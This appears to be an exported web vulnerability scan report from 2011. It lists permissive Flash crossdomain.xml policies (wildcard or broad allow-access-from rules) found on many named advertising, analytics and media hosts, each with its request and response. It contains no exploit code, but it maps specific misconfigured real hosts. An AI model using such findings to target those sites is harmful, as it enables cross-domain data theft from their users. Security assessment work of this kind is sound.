HTTP/1.0 200 OK Server: ZEDO 3G Content-Length: 247 Content-Type: application/xml ETag: "77adf2-f7-44d91a5da81c0" X-Varnish: 1215537576 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=6050 Date: Mon, 16 May 2011 01:30:23 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.gigya.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.gigya.com |
HTTP/1.0 200 OK Content-Length: 355 Content-Type: text/xml Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 x-server: web101 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" X-Powered-By: ASP.NET Cache-Control: max-age=86400 Date: Sun, 15 May 2011 21:19:55 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80" /> ...[SNIP]... <allow-access-from domain="*" to-ports="443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.turn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.turn.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Pragma: private Content-Type: text/xml;charset=UTF-8 Cache-Control: private, max-age=0 Expires: Mon, 16 May 2011 01:19:51 GMT Date: Mon, 16 May 2011 01:19:51 GMT Content-Length: 100 Connection: close <?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn5.tribalfusion |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn5.tribalfusion.com |
HTTP/1.0 200 OK P3p: CP="NOI DEVo TAIa OUR BUS" X-Function: 305 Content-Length: 102 X-Reuse-Index: 710 Content-Type: text/xml Date: Sun, 15 May 2011 21:31:35 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://ctix8.cheaptickets |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ctix8.cheaptickets.com |
HTTP/1.1 200 OK Content-Length: 82 Content-Type: text/xml Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT Accept-Ranges: bytes ETag: "ef9fe45d4643c81:80c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:22:46 GMT Connection: close <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://d.xp1.ru4.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: d.xp1.ru4.com |
HTTP/1.1 200 OK Server: Sun-Java-System-Web Date: Mon, 16 May 2011 01:19:58 GMT P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI" Content-type: text/xml Last-modified: Mon, 22 Nov 2010 21:32:05 GMT Content-length: 202 Etag: "ca-4ceae155" Accept-ranges: bytes Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dar.youknowbest |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: dar.youknowbest.com |
HTTP/1.0 200 OK Content-Length: 207 Content-Type: text/xml Content-Location: http://dar.youknowbest Last-Modified: Wed, 08 Dec 2010 17:37:14 GMT Accept-Ranges: bytes ETag: "01e78cfe96cb1:de1" Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Server: CO-ADSWEB01 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:41:16 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feeds.delicious |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: feeds.delicious.com |
HTTP/1.0 200 OK Date: Mon, 16 May 2011 01:25:00 GMT P3P: policyref="http://info Last-Modified: Tue, 10 May 2011 23:41:14 GMT Accept-Ranges: bytes Content-Length: 202 Content-Type: application/xml Age: 0 Server: YTS/1.19.4 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fingerhut.tt |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fingerhut.tt.omtrdc.net |
HTTP/1.1 200 OK ETag: W/"201-1304618936000" Accept-Ranges: bytes Content-Length: 201 Date: Mon, 16 May 2011 01:33:11 GMT Connection: close Last-Modified: Thu, 05 May 2011 18:08:56 GMT Server: Test & Target Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sun, 15 May 2011 02:39:40 GMT Expires: Sat, 30 Apr 2011 02:36:16 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 64028 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gannett.gcion.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: gannett.gcion.com |
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache Content-Type: text/xml Content-Length: 111 <?xml version="1.0" ?><cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://gscounters.gigya |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: gscounters.gigya.com |
HTTP/1.1 200 OK Content-Length: 341 Content-Type: text/xml Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT Accept-Ranges: bytes ETag: "c717c7c65530ca1:2af5" Server: Microsoft-IIS/6.0 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" x-server: web205 X-Powered-By: ASP.NET Date: Sun, 15 May 2011 21:19:57 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80" /> ...[SNIP]... <allow-access-from domain="*" to-ports="443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://i.w55c.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: i.w55c.net |
HTTP/1.0 200 OK Cache-Control: max-age=86400 Date: Mon, 16 May 2011 01:17:20 GMT Server: Jetty(6.1.22) Content-Type: application/xml Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Content-Length: 488 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" to-ports="*"/> <site-control ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ib.adnxs.com |
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 21:34:01 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218 Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://idcs.interclick |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: idcs.interclick.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT Accept-Ranges: bytes ETag: "7b643f1dafecb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: policyref="http://www Date: Sun, 15 May 2011 20:32:17 GMT Connection: close Content-Length: 225 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://js.revsci.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: js.revsci.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Mon, 16 May 2011 01:19:37 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- allow Flash 7+ players to invoke JS from this server --> <cross-domain-po ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.fingerhut |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: metrics.fingerhut.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:33:35 GMT Server: Omniture DC/2.0.0 xserver: www28 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.mcafee.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: metrics.mcafee.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:39:52 GMT Server: Omniture DC/2.0.0 xserver: www68 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.sonystyle |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: metrics.sonystyle.com |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:19:59 GMT Server: Omniture DC/2.0.0 xserver: www201 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.us |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: metrics.us.playstation |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 20:26:45 GMT Server: Omniture DC/2.0.0 xserver: www339 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://nexus2.ensighten |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: nexus2.ensighten.com |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:20:09 GMT Server: Apache Last-Modified: Fri, 17 Dec 2010 04:42:59 GMT ETag: "4b9cf-145-49793ce00fac0" Accept-Ranges: bytes Content-Length: 325 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://p.brilig.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: p.brilig.com |
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: application/xml Date: Mon, 16 May 2011 01:23:25 GMT ETag: "3a149-ab-4a3053698f340" Last-Modified: Wed, 11 May 2011 19:38:13 GMT P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM" Server: Apache/2.2.16 (Ubuntu) X-Brilig-D: D=84 Content-Length: 171 Connection: Close <?xml version="1.0" ?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pix04.revsci.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Mon, 16 May 2011 01:24:04 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- allow Flash 7+ players to invoke JS from this server --> <cross-domain-po ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.33across.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.33across.com |
HTTP/1.1 200 OK Accept-Ranges: bytes ETag: W/"211-1298012359000" Last-Modified: Fri, 18 Feb 2011 06:59:19 GMT Content-Type: application/xml Content-Length: 211 Date: Mon, 16 May 2011 01:29:35 GMT Connection: close Server: 33XG1 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" secure="false"/> </cross-doma ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.invitemedia |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.invitemedia.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 16 May 2011 01:19:50 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: r.turn.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: private Pragma: private Expires: Sun, 15 May 2011 20:26:59 GMT Content-Type: text/xml;charset=UTF-8 Date: Sun, 15 May 2011 20:26:59 GMT Connection: close <?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://secure-us |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: secure-us.imrworldwide |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:30:58 GMT Server: Apache Cache-Control: max-age=604800 Expires: Sun, 22 May 2011 21:30:58 GMT Last-Modified: Wed, 14 May 2008 01:55:09 GMT ETag: "10c-482a467d" Accept-Ranges: bytes Content-Length: 268 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> <site-control permi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://serv.adspeed.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: serv.adspeed.com |
HTTP/1.0 200 OK Content-Type: text/xml Accept-Ranges: bytes Last-Modified: Thu, 27 May 2010 16:12:36 GMT Content-Length: 357 Connection: close Date: Mon, 16 May 2011 01:20:34 GMT Server: AdSpeed/s12 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for AdSpeed Ad Server --> <cross-domain-policy> <site-control ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sony.links |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sony.links.channelin |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Fri, 09 Nov 2007 14:45:11 GMT ETag: "80753121df22c81:320b" Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" X-Powered-By: ASP.NET Date: Sun, 15 May 2011 20:26:33 GMT Content-Length: 206 Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sony.links.origin |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sony.links.origin |
HTTP/1.1 200 OK Content-Length: 206 Content-Type: text/xml Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT Accept-Ranges: bytes ETag: "eb20ee82e722c81:2dd2" Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" Date: Sun, 15 May 2011 20:26:47 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sony.tcliveus.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sony.tcliveus.com |
HTTP/1.1 200 OK Cache-control: no-cache, private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: Keep-Alive Content-Length: 79 Last-Modified: Sun, 15 May 2011 21:20:49 GMT Content-Type: application/xml; charset=ISO-8859-1 Date: Sun, 15 May 2011 21:20:49 GMT Set-Cookie: NSC_Tpo`=445b326b7863 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://sony.tt.omtrdc.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sony.tt.omtrdc.net |
HTTP/1.1 200 OK ETag: W/"201-1304618936000" Accept-Ranges: bytes Content-Length: 201 Date: Sun, 15 May 2011 21:19:59 GMT Connection: close Last-Modified: Thu, 05 May 2011 18:08:56 GMT Server: Test & Target Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sonycomputere |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sonycomputerentertai.tt |
HTTP/1.1 200 OK ETag: W/"201-1304618936000" Accept-Ranges: bytes Content-Length: 201 Date: Sun, 15 May 2011 20:26:46 GMT Connection: close Last-Modified: Thu, 05 May 2011 18:08:56 GMT Server: Test & Target Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sync.mathtag.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sync.mathtag.com |
HTTP/1.0 200 OK Cache-Control: no-cache Connection: close Content-Type: text/cross-domain-policy Etag: 4dd07bc8-e97b-118c-3dec P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x220a 8714 Set-Cookie: ts=1305509186; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:26:26 GMT Connection: keep-alive Content-Length: 215 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://t.invitemedia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: t.invitemedia.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 16 May 2011 01:26:58 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://tags.bluekai.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: tags.bluekai.com |
HTTP/1.0 200 OK Date: Mon, 16 May 2011 01:26:44 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT ETag: "c80001-ca-49dea97c4ae40" Accept-Ranges: bytes Content-Length: 202 Content-Type: text/xml Connection: close <cross-domain-policy> <allow-access-from domain="*" to-ports="*"/> <site-control permitted-cross-domain <allow-http-request </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ttwbs.channel |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ttwbs.channelintelligence |
HTTP/1.0 200 OK Cache-Control: max-age=86400 Date: Sun, 15 May 2011 20:26:57 GMT Server: Jetty(6.1.22) Content-Type: application/xml Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Content-Length: 441 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://turn.nexac.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: turn.nexac.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: private Pragma: private Expires: Mon, 16 May 2011 01:26:47 GMT Content-Type: text/xml;charset=UTF-8 Date: Mon, 16 May 2011 01:26:46 GMT Connection: close <?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://usatoday1.112.2o7 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: usatoday1.112.2o7.net |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:26:53 GMT Server: Omniture DC/2.0.0 xserver: www147 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://w88.go.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: w88.go.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:27:17 GMT Server: Omniture DC/2.0.0 xserver: www498 Content-Length: 167 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://webtrends |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: webtrends.telegraph.co.uk |
HTTP/1.1 200 OK Content-Length: 82 Content-Type: text/xml Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT Accept-Ranges: bytes ETag: "ef9fe45d4643c81:8fb" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:19:37 GMT Connection: close <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.viddler.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.viddler.com |
HTTP/1.1 200 OK Server: nginx/0.6.32 Date: Sun, 15 May 2011 20:26:39 GMT Content-Type: application/xml Connection: close X-Viddler-Node: viddler_d Accept-Ranges: bytes ETag: W/"80-1303891997000" Last-Modified: Wed, 27 Apr 2011 08:13:17 GMT Content-Length: 80 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://adadvisor.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: adadvisor.net |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:31:36 GMT Connection: close Server: AAWebServer P3P: policyref="http://www Content-Length: 478 Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.tubemogul.com" /> ...[SNIP]... <allow-access-from domain="*.adap.tv" /> ...[SNIP]... <allow-access-from domain="*.videoegg.com" /> ...[SNIP]... <allow-access-from domain="*.tidaltv.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://api.tweetmeme.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: api.tweetmeme.com |
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 01:25:09 GMT Content-Type: text/xml; charset='utf-8' Connection: close P3P: CP="CAO PSA" Expires: Mon, 16 May 2011 01:25:25 +0000 GMT Etag: 686d9b984ed45b19cd2a X-Served-By: vanga <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://content.usatoday |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: content.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 16 Mar 2011 20:16:45 GMT Accept-Ranges: bytes ETag: "2bdf8b1217e4cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 16 May 2011 01:19:47 GMT Connection: close Content-Length: 1558 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="projects.usatoday.com"/> <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.metagrapher.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://contextweb |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: contextweb.usatoday.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 16 Mar 2011 20:16:45 GMT ETag: "8034251217e4cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 16 May 2011 01:19:45 GMT Content-Length: 1558 Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.metagrapher.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://cookex.amp.yahoo |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cookex.amp.yahoo.com |
